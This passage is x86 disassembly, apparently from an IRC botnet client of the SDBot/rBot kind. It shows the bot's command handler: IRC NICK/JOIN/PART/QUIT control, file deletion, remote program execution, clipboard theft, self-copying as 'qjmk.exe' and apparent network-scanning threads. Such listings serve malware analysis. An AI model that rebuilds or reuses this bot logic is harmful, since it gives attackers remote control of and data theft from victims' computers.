loc_40BBAE: ; CODE XREF: sub_4087B3+15B0�j
; sub_4087B3+15C5�j
push offset aR ; "r"
push [ebp+arg_10]
call sub_417012
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_40BC2C
mov esi, 200h
push edi
lea eax, [ebp+var_2E4]
push esi
push eax
call sub_417A47
add esp, 0Ch
loc_40BBD9: ; CODE XREF: sub_4087B3+3455�j
test eax, eax
jz short loc_40BC0A
push 1
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
push edi
lea eax, [ebp+var_2E4]
push esi
push eax
call sub_417A47
add esp, 20h
jmp short loc_40BBD9
; ---------------------------------------------------------------------------
loc_40BC0A: ; CODE XREF: sub_4087B3+3428�j
push edi
call sub_416D94
push [ebp+arg_10]
lea eax, [ebp+var_2E4]
push offset unk_42E300
push eax
call sub_416821
add esp, 10h
jmp loc_40B5AF
; ---------------------------------------------------------------------------
loc_40BC2C: ; CODE XREF: sub_4087B3+340E�j
push [ebp+arg_10]
push offset unk_42E2CC
jmp loc_40CEF5
; ---------------------------------------------------------------------------
loc_40BC39: ; CODE XREF: sub_4087B3+1586�j
; sub_4087B3+159B�j
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_10]
push [ebp+var_C]
call sub_417760
pop ecx
cmp eax, ebx
pop ecx
jz loc_40D023
push eax
call sub_4011F4
test eax, eax
pop ecx
jnz short loc_40BC6C
push offset dword_42E29C
jmp loc_40BE82
; ---------------------------------------------------------------------------
loc_40BC6C: ; CODE XREF: sub_4087B3+34AD�j
push offset dword_42E270
jmp loc_40BE82
; ---------------------------------------------------------------------------
loc_40BC76: ; CODE XREF: sub_4087B3+155C�j
; sub_4087B3+1571�j
push 7Fh
lea eax, [ebp+var_6F4]
push [ebp+arg_10]
push eax
call sub_416A10
mov esi, [ebp+esi+var_98]
add esp, 0Ch
cmp esi, ebx
jz short loc_40BCA7
push 7Fh
lea eax, [ebp+var_674]
push esi
push eax
call sub_416A10
add esp, 0Ch
loc_40BCA7: ; CODE XREF: sub_4087B3+34E0�j
push 7Fh
lea eax, [ebp+var_5F4]
push [ebp+var_98]
push eax
call sub_416A10
mov eax, [ebp+arg_4]
push [ebp+arg_10]
mov [ebp+var_6F8], eax
mov eax, [ebp+var_8]
mov [ebp+var_570], eax
mov eax, [ebp+var_4]
mov [ebp+var_56C], eax
lea eax, [ebp+var_2E4]
push offset dword_42E248
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 14h
push eax
call sub_40105F
add esp, 24h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6F8]
push ebx
push eax
push offset sub_4011B3
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40BD47
loc_40BD31: ; CODE XREF: sub_4087B3+3592�j
cmp [ebp+var_568], ebx
jnz loc_40CC93
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40BD31
; ---------------------------------------------------------------------------
loc_40BD47: ; CODE XREF: sub_4087B3+357C�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42E1F0
jmp loc_40CC84
; ---------------------------------------------------------------------------
loc_40BD58: ; CODE XREF: sub_4087B3+1532�j
; sub_4087B3+1547�j
push [ebp+arg_10]
call ds:dword_495394 ; DeleteFileA
test eax, eax
jz short loc_40BD6F
push [ebp+arg_10]
push offset dword_42E1C4
jmp short loc_40BD7A
; ---------------------------------------------------------------------------
loc_40BD6F: ; CODE XREF: sub_4087B3+35B0�j
push offset dword_42E798
call sub_4010F5
push eax
loc_40BD7A: ; CODE XREF: sub_4087B3+35BA�j
lea eax, [ebp+var_2E4]
push 200h
push eax
call sub_4163D7
add esp, 10h
jmp loc_40A0FB
; ---------------------------------------------------------------------------
loc_40BD93: ; CODE XREF: sub_4087B3+1508�j
; sub_4087B3+151D�j
push [ebp+arg_10]
call sub_416CCF
push eax
call sub_40124E
pop ecx
pop ecx
push 1
pop esi
push [ebp+arg_10]
cmp eax, esi
jnz short loc_40BDB4
push offset unk_42E18C
jmp short loc_40BDB9
; ---------------------------------------------------------------------------
loc_40BDB4: ; CODE XREF: sub_4087B3+35F8�j
push offset unk_42E144
loc_40BDB9: ; CODE XREF: sub_4087B3+35FF�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_40B354
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
jmp loc_40B354
; ---------------------------------------------------------------------------
loc_40BDF2: ; CODE XREF: sub_4087B3+14DE�j
; sub_4087B3+14F3�j
push ebx
push ebx
push [ebp+arg_10]
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_401280
add esp, 18h
cmp eax, 1
push [ebp+arg_10]
jnz short loc_40BE18
push offset unk_42E110
jmp loc_40CEF5
; ---------------------------------------------------------------------------
loc_40BE18: ; CODE XREF: sub_4087B3+3659�j
push offset unk_42E0CC
jmp loc_40CEF5
; ---------------------------------------------------------------------------
loc_40BE22: ; CODE XREF: sub_4087B3+14B4�j
; sub_4087B3+14C9�j
mov esi, [ebp+arg_10]
push esi
call dword_49169C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40BE62
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call dword_491614 ; gethostbyaddr
cmp eax, ebx
jz short loc_40BE7D
push dword ptr [eax]
loc_40BE48: ; CODE XREF: sub_4087B3+36C8�j
push esi
lea eax, [ebp+var_2E4]
push offset dword_42E09C
push eax
call sub_416821
add esp, 10h
jmp loc_40A6BC
; ---------------------------------------------------------------------------
loc_40BE62: ; CODE XREF: sub_4087B3+367F�j
push esi
call dword_4916E0 ; gethostbyname
cmp eax, ebx
jz short loc_40BE7D
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_4916E8 ; inet_ntoa
push eax
jmp short loc_40BE48
; ---------------------------------------------------------------------------
loc_40BE7D: ; CODE XREF: sub_4087B3+3691�j
; sub_4087B3+36B8�j
push offset dword_42E060
loc_40BE82: ; CODE XREF: sub_4087B3+2C3A�j
; sub_4087B3+34B4�j ...
lea eax, [ebp+var_2E4]
push eax
call sub_416821
pop ecx
pop ecx
jmp loc_40A6BC
; ---------------------------------------------------------------------------
loc_40BE95: ; CODE XREF: sub_4087B3+148A�j
; sub_4087B3+149F�j
push 7Fh
push [ebp+arg_10]
push [ebp+arg_14]
call sub_416A10
push [ebp+arg_10]
lea eax, [ebp+var_2E4]
push offset unk_42E028
push eax
call sub_416821
add esp, 18h
jmp loc_40B330
; ---------------------------------------------------------------------------
loc_40BEBE: ; CODE XREF: sub_4087B3+1460�j
; sub_4087B3+1475�j
push 5
push ebx
push ebx
push [ebp+arg_10]
push offset aOpen ; "open"
push ebx
call dword_4915D0
push [ebp+arg_10]
test eax, eax
jz short loc_40BEE2
push offset unk_42DFF8
jmp loc_40CEF5
; ---------------------------------------------------------------------------
loc_40BEE2: ; CODE XREF: sub_4087B3+3723�j
push offset unk_42DFC0
jmp loc_40CEF5
; ---------------------------------------------------------------------------
loc_40BEEC: ; CODE XREF: sub_4087B3+1436�j
; sub_4087B3+144B�j
mov eax, [ebp+arg_10]
mov cl, [eax]
mov byte_42C952, cl
movsx eax, byte ptr [eax]
push eax
push offset unk_42DF88
jmp loc_40CFA0
; ---------------------------------------------------------------------------
loc_40BF05: ; CODE XREF: sub_4087B3+140C�j
; sub_4087B3+1421�j
push [ebp+arg_10]
call sub_416CCF
test eax, eax
pop ecx
jle loc_40D023
push [ebp+arg_10]
call sub_416CCF
cmp eax, 1F4h
pop ecx
jge loc_40D023
push ebx
push ebx
lea eax, [ebp+var_20]
push 2
push eax
call sub_401343
push eax
lea eax, [ebp+var_2E4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_416821
add esp, 1Ch
jmp loc_40B759
; ---------------------------------------------------------------------------
loc_40BF51: ; CODE XREF: sub_4087B3+13E2�j
; sub_4087B3+13F7�j
mov edi, [ebp+arg_10]
push edi
call sub_416CCF
test eax, eax
pop ecx
jle loc_408B77
push edi
call sub_416CCF
mov esi, 1F4h
pop ecx
cmp eax, esi
jge loc_408B77
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E92C[eax]
call sub_401032
pop ecx
pop ecx
push esi
call ds:dword_495324 ; Sleep
push edi
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E92C[eax]
call dword_4916F4 ; closesocket
push [ebp+var_10]
push edi
call sub_416CCF
imul eax, 234h
pop ecx
push dword_43E934[eax]
call ds:dword_4953B4 ; TerminateThread
push edi
call sub_416CCF
imul eax, 234h
push edi
mov dword_43E934[eax], ebx
call sub_416CCF
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_43E720[eax], bl
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_40BFFD: ; CODE XREF: sub_4087B3+13B8�j
; sub_4087B3+13CD�j
push [ebp+arg_10]
push offset dword_42DF74
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_40C02E
call sub_401109
cmp eax, ebx
jle short loc_40C024
push eax
push offset unk_42DF38
jmp loc_40A71E
; ---------------------------------------------------------------------------
loc_40C024: ; CODE XREF: sub_4087B3+3864�j
push offset unk_42DEFC
jmp loc_40C455
; ---------------------------------------------------------------------------
loc_40C02E: ; CODE XREF: sub_4087B3+385B�j
mov eax, [ebp+var_A8]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_408B77
lea eax, [ebp+edi*4+var_A0]
mov [ebp+arg_24], eax
loc_40C04A: ; CODE XREF: sub_4087B3+3908�j
mov eax, [ebp+arg_24]
mov esi, [eax]
cmp esi, ebx
jz loc_408B77
push esi
call sub_416CCF
push eax
call sub_4010A5
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_40C071
push offset unk_42DEC8
jmp short loc_40C076
; ---------------------------------------------------------------------------
loc_40C071: ; CODE XREF: sub_4087B3+38B5�j
push offset unk_42DE88
loc_40C076: ; CODE XREF: sub_4087B3+38BC�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40C0A6
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
loc_40C0A6: ; CODE XREF: sub_4087B3+38D5�j
lea eax, [ebp+var_2E4]
push eax
call sub_401014
add [ebp+arg_24], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_40C04A
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_40C0C2: ; CODE XREF: sub_4087B3+138E�j
; sub_4087B3+13A3�j
cmp [ebp+var_C], ebx
jz loc_40D023
push [ebp+arg_10]
push [ebp+var_C]
call sub_417760
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40D023
push esi
push offset aS ; "%s\r\n"
push [ebp+arg_4]
call sub_401032
push esi
push offset dword_42DE60
jmp short loc_40C14E
; ---------------------------------------------------------------------------
loc_40C0F8: ; CODE XREF: sub_4087B3+1364�j
; sub_4087B3+1379�j
push [ebp+arg_10]
push offset aPartS_0 ; "PART %s\r\n"
push [ebp+arg_4]
call sub_401032
push [ebp+arg_10]
push offset unk_42DE2C
jmp short loc_40C14E
; ---------------------------------------------------------------------------
loc_40C112: ; CODE XREF: sub_4087B3+133A�j
; sub_4087B3+134F�j
push [ebp+esi+var_98]
push [ebp+arg_10]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_401032
push [ebp+arg_10]
push offset unk_42DDF8
jmp loc_40B813
; ---------------------------------------------------------------------------
loc_40C136: ; CODE XREF: sub_4087B3+1310�j
; sub_4087B3+1325�j
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_401032
push [ebp+arg_10]
push offset unk_42DDC4
loc_40C14E: ; CODE XREF: sub_4087B3+3191�j
; sub_4087B3+3943�j ...
call sub_4012B2
loc_40C153: ; CODE XREF: sub_4087B3+31F9�j
add esp, 14h
jmp loc_40D023
; ---------------------------------------------------------------------------
loc_40C15B: ; CODE XREF: sub_4087B3+12D4�j
; sub_4087B3+12E9�j
mov al, byte_42B03A
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_42B03A
jz loc_408B77
mov ecx, edx
loc_40C172: ; CODE XREF: sub_4087B3+39C7�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_40C172
cmp al, bl
jz loc_408B77
mov [ebp+arg_18], edx
loc_40C187: ; CODE XREF: sub_4087B3+3C92�j
push 8
call sub_4010E6
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 0C8h
jle short loc_40C1D6
push ecx
lea eax, [ebp+var_2E4]
push offset dword_42EC14
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 20h
jmp loc_40C43C
; ---------------------------------------------------------------------------
loc_40C1D6: ; CODE XREF: sub_4087B3+39EE�j
or [ebp+var_300], 0FFFFFFFFh
cmp dword_42AF28, ebx
mov [ebp+var_304], 1Eh
mov [ebp+var_318], 5
mov [ebp+var_314], 140h
mov [ebp+arg_0], ebx
jz short loc_40C247
mov eax, [ebp+arg_18]
mov edi, offset dword_42AF28
lea esi, [eax-0Ah]
loc_40C211: ; CODE XREF: sub_4087B3+3A76�j
lea eax, [edi-28h]
push esi
push eax
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_40C22D
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_40C211
jmp short loc_40C247
; ---------------------------------------------------------------------------
loc_40C22D: ; CODE XREF: sub_4087B3+3A6C�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_300], eax
imul ecx, 3Ch
mov ecx, dword_42AF28[ecx]
mov [ebp+var_31C], ecx
loc_40C247: ; CODE XREF: sub_4087B3+3A51�j
; sub_4087B3+3A78�j
cmp [ebp+var_31C], ebx
jz loc_40C450
push 10h
lea eax, [ebp+arg_10]
pop esi
push eax
lea eax, [ebp+var_D8]
push eax
mov [ebp+arg_10], esi
push [ebp+arg_4]
call dword_491600 ; getsockname
mov al, [ebp+var_9B3]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_4916E8 ; inet_ntoa
push eax
lea eax, [ebp+var_430]
push eax
call sub_416A10
xor eax, eax
cmp [ebp+var_9B3], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_430]
push eax
call sub_4169E0
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_40C2E9
loc_40C2C7: ; CODE XREF: sub_4087B3+3B34�j
cmp eax, ebx
jz short loc_40C2E9
mov byte ptr [eax], 78h
lea eax, [ebp+var_430]
push 30h
push eax
call sub_4169E0
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_40C2C7
loc_40C2E9: ; CODE XREF: sub_4087B3+3B12�j
; sub_4087B3+3B16�j
mov eax, [ebp+arg_4]
push [ebp+var_98]
mov esi, [ebp+var_4]
mov [ebp+var_320], eax
mov eax, [ebp+var_8]
mov edi, 80h
mov [ebp+var_2F4], eax
lea eax, [ebp+var_420]
push edi
push eax
mov [ebp+var_2F0], 1
mov [ebp+var_2F8], esi
call sub_4163D7
push offset byte_4370BC
push offset aAwk1 ; "##awk1"
call sub_416B70
add esp, 14h
test eax, eax
jz short loc_40C353
push offset aAwk1 ; "##awk1"
lea eax, [ebp+var_3A0]
push edi
push eax
call sub_4163D7
add esp, 0Ch
jmp short loc_40C359
; ---------------------------------------------------------------------------
loc_40C353: ; CODE XREF: sub_4087B3+3B87�j
mov [ebp+var_3A0], bl
loc_40C359: ; CODE XREF: sub_4087B3+3B9E�j
cmp [ebp+var_2F0], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_40C36B
mov eax, offset aSequential ; "Sequential"
loc_40C36B: ; CODE XREF: sub_4087B3+3BB1�j
push [ebp+var_304]
lea ecx, [ebp+var_430]
push [ebp+var_314]
push [ebp+var_318]
push [ebp+var_31C]
push ecx
push eax
lea eax, [ebp+var_2E4]
push offset dword_42EB28
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 8
push eax
call sub_40105F
add esp, 2Ch
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_430]
push ebx
push eax
push offset loc_401366
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40C3F5
loc_40C3E3: ; CODE XREF: sub_4087B3+3C40�j
cmp [ebp+var_2EC], ebx
jnz short loc_40C410
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40C3E3
; ---------------------------------------------------------------------------
loc_40C3F5: ; CODE XREF: sub_4087B3+3C2E�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E4]
push offset dword_42EADC
push eax
call sub_416821
add esp, 0Ch
loc_40C410: ; CODE XREF: sub_4087B3+3C36�j
cmp [ebp+var_8], ebx
jnz short loc_40C42F
push ebx
lea eax, [ebp+var_2E4]
push esi
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
loc_40C42F: ; CODE XREF: sub_4087B3+3C60�j
lea eax, [ebp+var_2E4]
push eax
call sub_401014
pop ecx
loc_40C43C: ; CODE XREF: sub_4087B3+3A1E�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_40C187
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_40C450: ; CODE XREF: sub_4087B3+21D3�j
; sub_4087B3+3A9A�j
push offset dword_42DD78
loc_40C455: ; CODE XREF: sub_4087B3+2234�j
; sub_4087B3+3876�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
pop ecx
pop ecx
jmp loc_40A72D
; ---------------------------------------------------------------------------
loc_40C468: ; CODE XREF: sub_4087B3+12AA�j
; sub_4087B3+12BF�j
push 4
call sub_4010E6
test eax, eax
pop ecx
jle short loc_40C47E
push offset dword_42DD48
jmp loc_409E4E
; ---------------------------------------------------------------------------
loc_40C47E: ; CODE XREF: sub_4087B3+3CBF�j
mov eax, [ebp+esi+var_9C]
cmp eax, ebx
jz short loc_40C4A1
push eax
mov edi, 104h
lea eax, [ebp+var_804]
push edi
push eax
call sub_4163D7
add esp, 0Ch
jmp short loc_40C4B5
; ---------------------------------------------------------------------------
loc_40C4A1: ; CODE XREF: sub_4087B3+3CD4�j
mov edi, 104h
lea eax, [ebp+var_804]
push edi
push eax
push ebx
call ds:dword_495330 ; GetModuleFileNameA
loc_40C4B5: ; CODE XREF: sub_4087B3+3CEC�j
mov esi, [ebp+esi+var_98]
cmp esi, ebx
jnz short loc_40C4C5
mov esi, offset aQjmk_exe ; "qjmk.exe"
loc_40C4C5: ; CODE XREF: sub_4087B3+3D0B�j
push esi
lea eax, [ebp+var_700]
push edi
push eax
call sub_4163D7
mov eax, dword_42C920
push 7Fh
push [ebp+var_98]
mov [ebp+var_5F4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_5F8], ebx
mov [ebp+var_808], eax
lea eax, [ebp+var_5F0]
push eax
call sub_416A10
mov eax, [ebp+var_4]
mov [ebp+var_570], eax
mov eax, [ebp+var_8]
mov [ebp+var_56C], eax
lea eax, [ebp+var_700]
push eax
lea eax, [ebp+var_804]
push eax
lea eax, [ebp+var_2E4]
push [ebp+var_5F4]
push offset dword_42DCF0
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 4
push eax
call sub_40105F
add esp, 38h
mov [ebp+var_5FC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_808]
push ebx
push eax
push offset sub_4012EE
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_5FC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40C595
loc_40C57F: ; CODE XREF: sub_4087B3+3DE0�j
cmp [ebp+var_568], ebx
jnz loc_40B330
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40C57F
; ---------------------------------------------------------------------------
loc_40C595: ; CODE XREF: sub_4087B3+3DCA�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset dword_42DCA0
jmp loc_40CFA0
; ---------------------------------------------------------------------------
loc_40C5A6: ; CODE XREF: sub_4087B3+1280�j
; sub_4087B3+1295�j
mov edi, [ebp+esi+var_9C]
cmp edi, ebx
jz short loc_40C5C5
push edi
call sub_416CCF
test eax, eax
pop ecx
jz short loc_40C5C5
push edi
call sub_416CCF
pop ecx
jmp short loc_40C5CA
; ---------------------------------------------------------------------------
loc_40C5C5: ; CODE XREF: sub_4087B3+3DFC�j
; sub_4087B3+3E07�j
mov eax, dword_42C924
loc_40C5CA: ; CODE XREF: sub_4087B3+3E10�j
mov esi, [ebp+esi+var_98]
mov [ebp+var_584], eax
xor eax, eax
cmp [ebp+var_9B0], bl
setz al
cmp esi, ebx
mov [ebp+var_570], eax
jz short loc_40C5FD
lea eax, [ebp+var_688]
push esi
push eax
call sub_416821
pop ecx
pop ecx
jmp short loc_40C628
; ---------------------------------------------------------------------------
loc_40C5FD: ; CODE XREF: sub_4087B3+3E37�j
lea eax, [ebp+var_3E8]
push 104h
push eax
call ds:dword_495364 ; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+var_D4]
push ebx
push eax
lea eax, [ebp+var_3E8]
push eax
call sub_417900
add esp, 14h
loc_40C628: ; CODE XREF: sub_4087B3+3E48�j
lea eax, [ebp+var_688]
push eax
call sub_4158E0
cmp [ebp+eax+var_689], 5Ch
pop ecx
jnz short loc_40C653
lea eax, [ebp+var_688]
push eax
call sub_4158E0
pop ecx
mov [ebp+eax+var_689], bl
loc_40C653: ; CODE XREF: sub_4087B3+3E8A�j
push [ebp+var_98]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_910]
mov [ebp+var_914], esi
push 80h
push eax
call sub_4163D7
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_574], eax
lea eax, [ebp+var_688]
mov [ebp+var_578], edi
push eax
push [ebp+var_584]
push esi
call sub_401299
pop ecx
push eax
lea eax, [ebp+var_2E4]
push offset unk_42DC4C
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 3
push eax
call sub_40105F
add esp, 20h
mov [ebp+var_57C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_914]
push ebx
push eax
push offset sub_4012F8
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_57C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40C707
loc_40C6F5: ; CODE XREF: sub_4087B3+3F52�j
cmp [ebp+var_568], ebx
jnz short loc_40C722
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40C6F5
; ---------------------------------------------------------------------------
loc_40C707: ; CODE XREF: sub_4087B3+3F40�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42DBF8
loc_40C713: ; CODE XREF: sub_4087B3+26FC�j
; sub_4087B3+27F8�j ...
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 0Ch
loc_40C722: ; CODE XREF: sub_4087B3+26E0�j
; sub_4087B3+27DC�j ...
cmp [ebp+var_8], ebx
jnz loc_40CEDA
push ebx
lea eax, [ebp+var_2E4]
push edi
push eax
push [ebp+var_98]
push esi
loc_40C73B: ; CODE XREF: sub_4087B3+1F97�j
call sub_4010D2
add esp, 14h
jmp loc_40CEDA
; ---------------------------------------------------------------------------
loc_40C748: ; CODE XREF: sub_4087B3+1256�j
; sub_4087B3+126B�j
mov esi, [ebp+esi+var_9C]
cmp esi, ebx
jz short loc_40C75B
push esi
call sub_416CCF
jmp short loc_40C762
; ---------------------------------------------------------------------------
loc_40C75B: ; CODE XREF: sub_4087B3+3F9E�j
push 8
call sub_40128A
loc_40C762: ; CODE XREF: sub_4087B3+3FA6�j
cmp eax, ebx
pop ecx
jz loc_40D023
push eax
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010EB
jmp loc_40CBA6
; ---------------------------------------------------------------------------
loc_40C782: ; CODE XREF: sub_4087B3+122C�j
; sub_4087B3+1241�j
mov eax, dword_491584
cmp eax, ebx
jz short loc_40C79F
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_40C798
push offset dword_42DBC0
jmp short loc_40C7B4
; ---------------------------------------------------------------------------
loc_40C798: ; CODE XREF: sub_4087B3+3FDC�j
push offset dword_42DB80
jmp short loc_40C7B4
; ---------------------------------------------------------------------------
loc_40C79F: ; CODE XREF: sub_4087B3+3FD6�j
push offset dword_42DB40
jmp short loc_40C7B4
; ---------------------------------------------------------------------------
loc_40C7A6: ; CODE XREF: sub_4087B3+1202�j
; sub_4087B3+1217�j
call sub_40101E
test eax, eax
jz short loc_40C7CA
push offset dword_42DB08
loc_40C7B4: ; CODE XREF: sub_4087B3+3FE3�j
; sub_4087B3+3FEA�j ...
lea eax, [ebp+var_2E4]
push 200h
push eax
call sub_4163D7
jmp loc_40CF01
; ---------------------------------------------------------------------------
loc_40C7CA: ; CODE XREF: sub_4087B3+3FFA�j
push offset dword_42DAC8
jmp short loc_40C7B4
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_4087B3+11D8�j
; sub_4087B3+11ED�j
cmp [ebp+var_8], ebx
jnz short loc_40C7F0
push ebx
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
loc_40C7F0: ; CODE XREF: sub_4087B3+4021�j
push ebx
push [ebp+var_4]
call sub_4012C1
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
push offset dword_42DA84
jmp loc_40CA75
; ---------------------------------------------------------------------------
loc_40C812: ; CODE XREF: sub_4087B3+1127�j
; sub_4087B3+113C�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010DC
jmp loc_408B74
; ---------------------------------------------------------------------------
loc_40C82B: ; CODE XREF: sub_4087B3+10FD�j
; sub_4087B3+1112�j
push [ebp+esi+var_9C]
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_40134D
jmp loc_408B74
; ---------------------------------------------------------------------------
loc_40C848: ; CODE XREF: sub_4087B3+10D3�j
; sub_4087B3+10E8�j
or edi, 0FFFFFFFFh
call ds:dword_495340 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_9C]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_40C871
push esi
call sub_416CCF
pop ecx
mov edi, eax
loc_40C871: ; CODE XREF: sub_4087B3+40B3�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_40C88A
cmp edi, 0FFFFFFFFh
jnz loc_40D023
loc_40C88A: ; CODE XREF: sub_4087B3+40CC�j
push ebx
call sub_4011AE
push eax
lea eax, [ebp+var_2E4]
push offset dword_42DA5C
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
lea eax, [ebp+var_2E4]
push eax
call sub_401014
loc_40C8C7: ; CODE XREF: sub_4087B3+252D�j
add esp, 28h
jmp loc_40D023
; ---------------------------------------------------------------------------
loc_40C8CF: ; CODE XREF: sub_4087B3+10A9�j
; sub_4087B3+10BE�j
push 1Eh
call sub_4010E6
test eax, eax
pop ecx
jle short loc_40C903
cmp [ebp+var_8], ebx
jnz loc_408B77
push ebx
push [ebp+var_4]
push offset unk_42DA2C
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_40C903: ; CODE XREF: sub_4087B3+4126�j
push [ebp+var_98]
lea eax, [ebp+var_4DC]
push 80h
push eax
call sub_4163D7
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_9C]
mov [ebp+var_4E0], eax
mov eax, [ebp+var_4]
mov [ebp+var_454], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_450], eax
mov [ebp+var_458], ebx
jz short loc_40C964
push esi
push offset aFull ; "full"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jnz short loc_40C964
mov [ebp+var_458], 1
loc_40C964: ; CODE XREF: sub_4087B3+4194�j
; sub_4087B3+41A5�j
lea eax, [ebp+var_2E4]
push offset dword_42D9F4
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 1Eh
push eax
call sub_40105F
add esp, 14h
mov [ebp+var_45C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4E0]
push ebx
push eax
push offset sub_401316
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_45C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
